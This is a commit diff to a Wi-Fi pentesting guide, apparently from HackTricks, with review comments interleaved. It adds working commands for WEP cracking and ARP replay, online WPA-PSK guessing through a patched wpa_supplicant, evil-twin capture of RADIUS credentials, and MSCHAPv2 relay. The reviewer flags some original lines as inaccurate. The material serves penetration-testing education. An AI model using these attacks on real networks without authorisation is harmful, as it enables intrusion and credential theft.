Commit 1476833

Merge pull request #1760 from HackTricks-wiki/update_Wireless-_in_Fidelity__Pentesting_Wi-Fi_in_2025_20260114_124845
Wireless-(in)Fidelity Pentesting Wi-Fi in 2025
2 parents a8dc943 + b0f2fe0 commit 1476833

File tree

1 file changed (+78, -1 lines)
  • src/generic-methodologies-and-resources/pentesting-wifi

src/generic-methodologies-and-resources/pentesting-wifi/README.md

Lines changed: 78 additions & 1 deletion
@@ -108,6 +108,26 @@ This tool automates **WPS/WEP/WPA-PSK** attacks. It will automatically:
108108
- **+ Open** -- Useful to capture captive portal creds and/or perform LAN attacks
109109
- **+ WPA** -- Useful to capture WPA handshakes
110110

111+
## Open / OWE networks quick notes
112+
113+
- **Passive capture** on open SSIDs still works with monitor mode and tcpdump:
114+
115+
```bash
116+
iw wlan0 set type monitor
117+
ip link set wlan0 up
118+
iw wlan0 set channel 6
119+
tcpdump -i wlan0 -w capture.pcap
120+
```
121+
122+
- **OWE** (Opportunistic Wireless Encryption) performs a per-station key exchange (no PSK), so air frames are encrypted even on "open" SSIDs. Being WPA3-based, it also enforces **802.11w PMF**, which blocks spoofed deauth/disassoc frames.
123+
- OWE **does not authenticate** joiners: anyone can associate, so **verify client isolation** instead of trusting marketing claims. Without isolation, ARP spoofing or responder-style poisoning on the local L2 still works.
124+
- **Evil Twin** remains feasible on open/OWE SSIDs by presenting a stronger signal; PMF just removes the deauth shortcut. If victims accept a forged TLS cert, full HTTP(S) MitM is regained.
125+
- Broadcast poisoning on open guest Wi-Fi easily yields creds/hashes (LLMNR/NBT-NS/mDNS). See:
126+
127+
{{#ref}}
128+
../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
129+
{{#endref}}
130+
111131
## DOS
112132

113133
### Deauthentication Packets
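Review bot: the monitor-mode snippet under "Passive capture" fails on most mac80211 drivers as written, because `iw wlan0 set type monitor` returns `command failed: Device or resource busy (-16)` while the interface is up; insert `ip link set wlan0 down` before it, and the existing `ip link set wlan0 up` then brings the monitor interface back up. Also, "Being WPA3-based" in the OWE bullet is inaccurate: OWE is RFC 8110, certified by the Wi-Fi Alliance as Wi-Fi Enhanced Open next to, not as part of, WPA3, and the PMF requirement comes from that certification; suggest "Like WPA3, Enhanced Open mandates 802.11w PMF".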
@@ -283,7 +303,22 @@ All the proposed WPS attacks can be easily performed using _**airgeddon.**_
283303

284304
## **WEP**
285305

286-
So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.
306+
**Why it collapses**
307+
308+
- RC4 seed is just **IV (24 bits) + shared key**. The IV is cleartext, tiny (2^24), and repeats quickly, so ciphertexts with the same IV reuse the keystream.
309+
- XORing two ciphertexts with the same keystream leaks `PlaintextA ⊕ PlaintextB`; predictable headers + RC4 KSA biases (**FMS**) let you “vote” key bytes. **PTW** optimises this using ARP traffic to drop requirements to tens of thousands of packets instead of millions.
310+
- Integrity is only **CRC32** (linear/unkeyed), so an attacker can flip bits and recompute CRC32 without the key → packet forgery/replay/ARP injection while waiting for IVs.
311+
312+
Practical break is deterministic:
313+
314+
```bash
315+
airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon # collect IVs
316+
# optionally speed up IVs without deauth by replaying ARP
317+
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
318+
aircrack-ng wep_capture-01.cap # PTW attack recovers key once IV threshold is met
319+
```
320+
321+
Airgeddon still ships an "All-in-One" WEP workflow if you prefer a guided UI.
287322

288323
![](<../../images/image (432).png>)
289324
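Review bot: the `aireplay-ng --arpreplay` line carries an unstated precondition: the AP drops injected frames from a station it has not associated, so `-h <clientMAC>` has to be the MAC of a client currently associated to the AP, and the replay only starts once a genuine ARP request has been captured, which on an idle network can take a long time; the comment "speed up IVs without deauth" should say so. Minor: "**Why it collapses**" is a bold line doing the job of a heading while the rest of the file uses `###` subheadings (e.g. `### Deauthentication Packets`), so `### Why it collapses` keeps the structure consistent. The CRC32 bullet could close the loop for readers by noting that this unkeyed integrity check is exactly why WPA introduced a keyed MIC.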

@@ -402,6 +437,36 @@ apt-get install pyrit #Not working for newer versions of kali
402437
pyrit -r psk-01.cap analyze
403438
```
404439

440+
#### Faster online PSK guessing via `wpa_supplicant` ctrl socket (no clients/PMKID)
441+
442+
When no clients are around and the AP refuses PMKID, you can iterate PSKs online without respawning supplicants:
443+
444+
- Patch `wpa_supplicant.c` to force `dur = 0;` in the auth failure backoff logic (around `ssid->auth_failures`), effectively disabling the temporary-disable timer.
445+
- Run a single daemon with a control socket:
446+
447+
```bash
448+
# wpa_supplicant.conf
449+
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
450+
update_config=1
451+
452+
wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf
453+
```
454+
455+
- Drive it via the control interface, reusing the same scan and network:
456+
457+
```text
458+
ADD_NETWORK
459+
SET_NETWORK 0 ssid "<ssid>"
460+
ENABLE_NETWORK 0
461+
SCAN
462+
(loop)
463+
SET_NETWORK 0 psk "<candidate>"
464+
REASSOCIATE
465+
wait for CTRL-EVENT-CONNECTED / DISCONNECTED
466+
```
467+
468+
A small Python loop reading socket events (`CTRL-EVENT-CONNECTED` / `CTRL-EVENT-DISCONNECTED`) can test ~100 guesses in ~5 minutes without scan overhead. It is still noisy and detectable, but avoids per-attempt process restarts and backoff delays.
469+
405470
## **WPA Enterprise (MGT)**
406471

407472
In **enterprise WiFi setups, you'll encounter various authentication methods**, each providing different security levels and management features. When you use tools like `airodump-ng` to inspect network traffic, you might notice identifiers for these authentication types. Some common methods include:
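Review bot: the control-interface sequence hard-codes network id `0`, but `ADD_NETWORK` returns the id of the network it created; if the supplicant already holds networks (or the config was saved on a previous run, which `update_config=1` allows), the id will differ and `SET_NETWORK 0 ...` will touch the wrong entry, so the text should use the id returned by `ADD_NETWORK`. The "still noisy and detectable" sentence would help defenders more if it said what the noise looks like: every `REASSOCIATE` with a wrong PSK yields an association followed by a 4-way handshake that never completes and ends in a deauthentication from the AP, so a single MAC producing dozens of such sequences per minute is what an AP log or WIDS rule should key on. The "~100 guesses in ~5 minutes" figure has no source in this hunk; if it comes from the Synacktiv post added under references, cite it here.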
@@ -714,6 +779,16 @@ Or you could also use:
714779
- `--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP` to specify manually the methods offered (offering the same auth methods in the same order as the organisation the attack will be much more difficult to detect).
715780
- [Find more info in the wiki](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/)
716781

782+
#### When clients skip RADIUS certificate validation (PEAP/TTLS)
783+
784+
- If devices are configured with "do not validate certificate", a cloned AP + rogue RADIUS (`eaphammer --cert-wizard --creds --auth wpa-eap`) will collect **NetNTLMv2** (PEAP-MSCHAPv2) or **cleartext** creds (PEAP-GTC). `bettercap` deauth (`wifi.deauth <BSSID>`) both reveals hidden SSIDs during probes and forces reconnects, unless PMF/802.11w blocks spoofed deauth.
785+
- Cracked NetNTLMv2 gives reusable Wi‑Fi/AD creds; GTC yields immediate plaintext.
786+
787+
#### Relaying PEAP-MSCHAPv2 instead of cracking (wpa_sycophant + hostapd-mana)
788+
789+
- For machine accounts with uncrackable random passwords, abuse **MSCHAPv2 relay**: run `hostapd-mana` as the Evil Twin, forwarding the MSCHAPv2 exchange to `wpa_sycophant`, which simultaneously connects to the legitimate AP. Successful relay grants authenticated Wi‑Fi without recovering the password.
790+
- Use builds that support the target security level (WPA3/PMF requires recent hostapd/wpa_supplicant); PMF prevents deauth coercion, so wait for voluntary client associations.
791+
717792
**Using Airgeddon**
718793

719794
`Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\
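Review bot: "NetNTLMv2" is the wrong hash type in the "skip RADIUS certificate validation" bullets: PEAP-MSCHAPv2 exposes the MSCHAPv2 challenge/response, which is built on the same DES-based scheme as NetNTLMv1 and is cracked as such (hashcat mode 5500), so "Cracked NetNTLMv2 gives reusable Wi‑Fi/AD creds" should read "Cracked MSCHAPv2 challenge/response". The `eaphammer --cert-wizard --creds --auth wpa-eap` command also folds two modes into one line; in eaphammer's README `--cert-wizard` is run on its own first and the `--creds --auth wpa-eap` capture is a separate invocation, so it is worth showing them as two commands. Since the heading is about clients that skip validation, a closing line naming the fix (enforce server certificate validation and pin the RADIUS CA and server name in the client profile) would make the section useful on the defensive side too.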
@@ -851,6 +926,8 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti
851926
- [The vulnerability that killed FreeWifi_Secure](https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/)
852927
- [RFC 4186 – EAP-SIM Authentication](https://datatracker.ietf.org/doc/html/rfc4186)
853928
- [3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses](https://www.3gpp.org/ftp/Specs/archive/33_series/33.402/)
929+
- [Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025 (Synacktiv)](https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi-fi-in-2025.html)
930+
- [PEAP relay attacks with wpa_sycophant (SensePost)](https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/)
854931
855932
856933
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
